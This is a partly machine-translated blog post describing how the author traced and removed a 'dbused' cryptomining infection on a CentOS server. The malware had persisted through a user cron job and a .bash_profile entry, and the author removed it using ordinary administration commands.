dbused fills up my CPU! Solution process of linux server mining virus
Symptom
Today, when logging in to the remote Cent OS server as an ordinary user tung with the key, the connection was very severely stuck. After entering, it was found that the CPU was occupied by a process named dbused !
After rebooting the server, log in to the server as root and find that the cpu is normal. Use the top command to check that dbused is not running, but the tung user's bash process and wget command will run from time to time. The tung user is not logged in, but the user's commands are run from time to time , which makes me feel very strange.
At this time, after logging in to the tung user, dbused is executed immediately and the entire CPU is occupied. It seems that the start of the dbused process is also closely related to the login activity of the user tung .
Solution process
1) Solve the problem that the user's bash and wget processes are executed when the user is not logged in
From time to time, the tung user uses the bash command and the wget command, and suspects that there is a scheduled task, so through the systemctl disable crondcommand, the automatic startup of crond is prohibited, the rebootserver is restarted, and the root user is logged in. At this time, no processes and commands under the tung user will appear.
crond是定时任务服务,有关命令补充如下:
systemctl start crond #启动服务
systemctl stop crond #关闭服务
systemctl restart crond #重启服务
systemctl reload crond #重新载入配置
systemctl status crond #查看crontab服务状态
systemctl enable crond #开启开机自动启动
systemctl disable crond #禁止开机自动启动
Entering the folder /var/spool/cron/of the timed task , I found that there is indeed a timed task of the tung user, so I almost deleted it.
2) Solve the problem that dbused will start and fill up the CPU as soon as a specific user logs in
As long as you log in to the tung user, dbused will be executed automatically, and the cpu will be filled up. It kill -9 <病毒PID>will be normal after the use of the kill, but it will still be executed next time you restart it.
This shows that the start of this virus is related to the user's login behavior. I /home/tung/.bash_profilefound the following line of abnormal code
after checking the file: In my previous attempts, I had located the file location of the process /tmp/dbused, but I did not /tmp/find it in it. Now The reason is clear: this line of command will first be /tmp/.pwn/bprofrcopied to /tmp/dbused, and then executed and deleted. In other words, the source is actually in this hidden folder.
So I /tmp/.pwn/bprofrdownloaded the file and uploaded it to virustotal . Well, it's the virus software. After
deleting it and modifying the .bash_profilefile, there is no abnormality after logging in to the user again.
Now the timed task service is systemctl enable crondrestarted, and there is no abnormality after reboot.
to sum up
- Some processes start from time to time when they shouldn't be started. You should suspect that there may be abnormal timing tasks. Check the
/var/spool/cron/directory. - For viruses that are automatically executed when a specific user logs in, you can check whether the
.bash_profilefiles in the user's directory are abnormal. - After locating the location of the virus file through various methods, delete it.
doubt
This is the second time the server has encountered a mining virus. The first time it encountered the kdevtmpfsi virus, it was still very simple at the time. The server used a password to log in. It is estimated that the password has been brute forcefully cracked. After that, I switched to key-only login, and the server was stable for a month. But I don't know why it is still attacked by viruses, maybe some open ports have loopholes.
I checked a lot of information in the process of cleaning up the virus. This article has provided me with a relatively large help: Alibaba Cloud server mining program solution process